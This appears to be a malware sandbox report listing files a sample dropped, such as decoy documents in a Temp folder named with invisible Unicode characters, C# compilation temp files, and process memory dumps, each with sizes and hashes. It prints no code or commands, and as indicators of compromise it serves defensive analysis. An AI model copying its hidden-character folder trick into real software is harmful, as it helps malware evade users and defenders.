f9a7a2825d2b4f64d0daa1a314a253b1372f93b8c4ee3365a50eb667bc9ee3856ba8007c238b25fd0d72bd6261f1140587043ce2329250c234d7403a4ec9a731

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Desktop\CompareBackup.M2TS

Filesize
555KB

MD5
cc96222dbee37cf6422bb3db0e462404

SHA1
be1f14901dbc7c0c6751a0aa47a491bce394f199

SHA256
affcbb9db1dba638a4aa0fcf2255c3288b3d29fcf9e7cbdda1a40cfe6d3b3c62

SHA512
230bcfc22c95a7a52db97e63d5a61b7a8eb04ca872a5ce259dc52b8850c90d98904bd51d7a863f3543223586e94450d3f741049a267a1be2270a5358d119b0d6

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Desktop\ConvertFromStop.xlsx

Filesize
11KB

MD5
0add24198e186f21053c866fd3c98a6c

SHA1
515ab0557037909401531f77a2cfe9d3aea8f2de

SHA256
677cd6cc46a5efef4e69999c8deb91f373a0c0b6344d0460b3a110c2a57be738

SHA512
bb88b8e261748fb70a6617f1e9bc33eef76b6b160590c2456e11eef73e125ed866b838e19de2733d95a135d90b0c6ceb9c9b5e573306894fc07abe25e8e8f74e

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Desktop\ConvertUninstall.txt

Filesize
594KB

MD5
9ad31f47bf687e5c45edf6ed2839ca47

SHA1
8044f95efc36a765fb7c0fa4db43af10b505a84a

SHA256
c7772009b240edd8049e3ac8c1295267496d0ce6a68871e7abf31546b8e4edb4

SHA512
3130a425047c679775748d1dcc204a31f4dd25538b6873b84af26693b7cdcfa9de392ddfee1fa21ddabc8e8f5d4eba2a9b1a7d707d50e37503b2a973d4ade425

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Desktop\DenySearch.docx

Filesize
19KB

MD5
dbb52de7cc1be6ebea9b301443989cc4

SHA1
baec88f55633723e100eec326b31f2a8892ca7d6

SHA256
0feed8b82a1697ece72199bff0d590efb05bdda025913bbdf2ad2cff57d37485

SHA512
714135f17e406d7cd9fd65598ccd4c657ee12443011f220f79f26d3db7cd7f05dd213e1e752aa56b0ad8175b63d143a359c43a0880f2a9884b8bcce04ca13c7f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Desktop\FormatSkip.xlsx

Filesize
10KB

MD5
95d589e68fd780eef0ce22cb6e29f7a0

SHA1
21368e95ee7e69b7eb697bd2d47a3faeed8826ed

SHA256
6c5134cb581d55362e076ff1fdca4cbabed1bad740e818c47882a1d928eddf58

SHA512
fe6e2a281e1b4adae063476d44bdd1b60c234194c8c87ae1fecff16266dfce68c50e2f2c4fbe2df3104c638414a403795dcae79050f816a044c2e16006df65b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Desktop\ResumeConfirm.xlsx

Filesize
438KB

MD5
2c4288be6d5df7d58be1d44fdc65132a

SHA1
3b42419c9f5381f4c93a05c4b8f67a4f90e90b34

SHA256
8e77564b8aab6ba628fab7464b216f70ff186b9f4d681e91442159a307364366

SHA512
90278e1a2bba6d58fbc8d24cc52dbf7ba85b65f7467b1915965470d3cf9a36d4353cb1980711c86317774b66c578132cc31cb60bb24a2d5dff48df500e3984b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\ExportTrace.xlsx

Filesize
9KB

MD5
619f7d3298747610695250e54798d2dc

SHA1
8008cd3d5e080123a6507532b8d99adbcb1a479c

SHA256
1650cd1bcf3fc15d317f1c91444be6cb370f564f2f5103c373eb4c080ffda131

SHA512
d9f3239ba628142cb8687871ec4468801fd02e6e9cc37947faa1044c2fe164144e4f4db224a57461ccc291b87fec458da5345a751511e0e6732d81a58591e1a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\ResetComplete.docx

Filesize
14KB

MD5
d77e857057e58eda9351f4f0221a42e8

SHA1
0d2741b59a4e4ba32cf617d3d857fa8db6cf83d0

SHA256
418cbf5eb26efc99e9f7670756e853cd9e0963bcb69401fd3178bf34e215808c

SHA512
c178f5652b6ca0711fbd24969cd3a6ef9779594c6948c57ece92c534568e1b830cff08739675ab2a081a75c2d0a2e8def52c8cd47345b08e95b97477f049121b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\RevokeStep.docx

Filesize
21KB

MD5
910313e06cf021397f34484bed86dcbf

SHA1
2474732e849b543bce34e90c3958219674868a8b

SHA256
7eb75aea8172fcdb2de82471bc5ba49ab91a1149783fc88357e8407de6505c54

SHA512
f528e205cfc79a6a03e4c6b53181336dd0960aef33eeadc6d86ebeafe30b7c978816f13a9355dbf1f9cd478f3a585a0d126b87c83f2b7c1728747f15d1ca3656

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\SubmitMount.docx

Filesize
14KB

MD5
69069f71dd55e6b4433ec9b9b6240f7e

SHA1
2db6f9517e0208a6528cab81dda3aae08859bafe

SHA256
3ead02e9adca0134258d25949b12022c8f68fc170f03eb983b09d164e44f0b68

SHA512
73c230edd94cb8ab3026a149426e278f02058995fad076f67d2a76ceba143c85e4349694f2ad9228c09249f70e0bfc828429066ed1ccb326210adb9e218ebed2

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\TestDismount.pdf

Filesize
774KB

MD5
848e8b53d750e9e4f3a8552cbef4e29f

SHA1
a2502f2a9092406b64eb2669091a0c1eb505e0ad

SHA256
e617113e6d0481e45a0c6a235a6f8cef134f382143fbc1f41f8d781143b6a84f

SHA512
31f37b6dd79cee6a55d4353d42593416552afc27c7854ed64db9c9607e21812645247b272d806c957d85440da1db6fce95881302dbb0ee565c79953afa3a47a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‎ ‏\Common Files\Documents\WriteExpand.xlsx

Filesize
15KB

MD5
d5717014ae64726a73fb57f25d10df50

SHA1
0d071284b3ac5e2a968bf1ad68b1126201794279

SHA256
36ad5de4daf74e657c47548ea4feef84a347c514de58c04bf16c634ca327031e

SHA512
c20fcd6a314615ebe84e5944be611d8a8f7ed9f6f0c072e9add07ae4a9883a3ebbcbec3746bd5c7ecac481da6f9f925596fd2ea26cdf5bff4a0330969128ac75

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jap30nqe\CSC61A885FFE3D04883AB46F985DFE19C35.TMP

Filesize
652B

MD5
5ac4a1f23285f445dca15a49dd9a61c7

SHA1
68e219365ac319daec8dfc1613582aa11e197898

SHA256
bae54dd3d111695053f543a77b6f11b8623dee69bfc5911f1993042392e44de3

SHA512
7d2a6e690fa26b6da4232f360f8e9be9587a28ed632051d6b328e753f96a6b8dde34d39451a8cf88bb32fd5d5d7a7b29ff8859dac898b86704b4618f5fb33f46

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jap30nqe\jap30nqe.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jap30nqe\jap30nqe.cmdline

Filesize
607B

MD5
7bcd994b5287d1f54b218f2447542715

SHA1
ea9bd0644433b23c30a66f128af1787d0f354733

SHA256
b66dff801d3e8f114159ffdac8d54e94323abc71ba1401d34879e5b4b5a5828c

SHA512
d9c0770b5fedbf3748fb4dc1e0c1add559be0624aede52c7816f04552ac2626f402b5d36a1d05c28652f18fbe7945ece748866253533d53a69ff31be45fc50d2

Download Submit
memory/2408-162-0x00000245ED7E0000-0x00000245ED802000-memory.dmp

Filesize
136KB

Download
memory/3716-58-0x00007FFB89380000-0x00007FFB893A3000-memory.dmp

Filesize
140KB

Download
memory/3716-25-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp

Filesize
5.9MB

Download
memory/3716-377-0x00007FFB89080000-0x00007FFB89094000-memory.dmp

Filesize
80KB

Download
memory/3716-83-0x00007FFB79270000-0x00007FFB7938C000-memory.dmp

Filesize
1.1MB

Download
memory/3716-78-0x00007FFB89850000-0x00007FFB8985D000-memory.dmp

Filesize
52KB

Download
memory/3716-73-0x000001800CC50000-0x000001800D179000-memory.dmp

Filesize
5.2MB

Download
memory/3716-71-0x00007FFB88CA0000-0x00007FFB88CD3000-memory.dmp

Filesize
204KB

Download
memory/3716-72-0x00007FFB79390000-0x00007FFB798B9000-memory.dmp

Filesize
5.2MB

Download
memory/3716-235-0x00007FFB88CA0000-0x00007FFB88CD3000-memory.dmp

Filesize
204KB

Download
memory/3716-236-0x00007FFB79390000-0x00007FFB798B9000-memory.dmp

Filesize
5.2MB

Download
memory/3716-237-0x000001800CC50000-0x000001800D179000-memory.dmp

Filesize
5.2MB

Download
memory/3716-276-0x00007FFB82290000-0x00007FFB8235D000-memory.dmp

Filesize
820KB

Download
memory/3716-64-0x00007FFB8E3E0000-0x00007FFB8E3ED000-memory.dmp

Filesize
52KB

Download
memory/3716-60-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp

Filesize
1.5MB

Download
memory/3716-300-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp

Filesize
144KB

Download
memory/3716-299-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp

Filesize
5.9MB

Download
memory/3716-305-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp

Filesize
1.5MB

Download
memory/3716-69-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp

Filesize
5.9MB

Download
memory/3716-56-0x00007FFB89B00000-0x00007FFB89B19000-memory.dmp

Filesize
100KB

Download
memory/3716-54-0x00007FFB895C0000-0x00007FFB895ED000-memory.dmp

Filesize
180KB

Download
memory/3716-47-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp

Filesize
144KB

Download
memory/3716-74-0x00007FFB82290000-0x00007FFB8235D000-memory.dmp

Filesize
820KB

Download
memory/3716-48-0x00007FFB92630000-0x00007FFB9263F000-memory.dmp

Filesize
60KB

Download
memory/3716-77-0x00007FFB89080000-0x00007FFB89094000-memory.dmp

Filesize
80KB

Download
memory/3716-182-0x00007FFB89250000-0x00007FFB89269000-memory.dmp

Filesize
100KB

Download
memory/3716-181-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp

Filesize
1.5MB

Download
memory/3716-70-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp

Filesize
144KB

Download
memory/3716-85-0x00007FFB89380000-0x00007FFB893A3000-memory.dmp

Filesize
140KB

Download
memory/3716-84-0x00007FFB89B00000-0x00007FFB89B19000-memory.dmp

Filesize
100KB

Download
memory/3716-63-0x00007FFB89250000-0x00007FFB89269000-memory.dmp

Filesize
100KB

Download
memory/3716-350-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp

Filesize
5.9MB

Download
memory/3716-365-0x00007FFB79A40000-0x00007FFB7A032000-memory.dmp

Filesize
5.9MB

Download
memory/3716-390-0x00007FFB79390000-0x00007FFB798B9000-memory.dmp

Filesize
5.2MB

Download
memory/3716-389-0x00007FFB88CA0000-0x00007FFB88CD3000-memory.dmp

Filesize
204KB

Download
memory/3716-388-0x00007FFB89250000-0x00007FFB89269000-memory.dmp

Filesize
100KB

Download
memory/3716-387-0x00007FFB8E3E0000-0x00007FFB8E3ED000-memory.dmp

Filesize
52KB

Download
memory/3716-386-0x00007FFB798C0000-0x00007FFB79A3E000-memory.dmp

Filesize
1.5MB

Download
memory/3716-385-0x00007FFB89380000-0x00007FFB893A3000-memory.dmp

Filesize
140KB

Download
memory/3716-384-0x00007FFB89B00000-0x00007FFB89B19000-memory.dmp

Filesize
100KB

Download
memory/3716-383-0x00007FFB895C0000-0x00007FFB895ED000-memory.dmp

Filesize
180KB

Download
memory/3716-382-0x00007FFB8E480000-0x00007FFB8E4A4000-memory.dmp

Filesize
144KB

Download
memory/3716-381-0x00007FFB92630000-0x00007FFB9263F000-memory.dmp

Filesize
60KB

Download
memory/3716-380-0x00007FFB82290000-0x00007FFB8235D000-memory.dmp

Filesize
820KB

Download
memory/3716-379-0x00007FFB79270000-0x00007FFB7938C000-memory.dmp

Filesize
1.1MB

Download
memory/3716-378-0x00007FFB89850000-0x00007FFB8985D000-memory.dmp

Filesize
52KB

Download
memory/3808-216-0x000001A0F8290000-0x000001A0F8298000-memory.dmp

Filesize
32KB

Download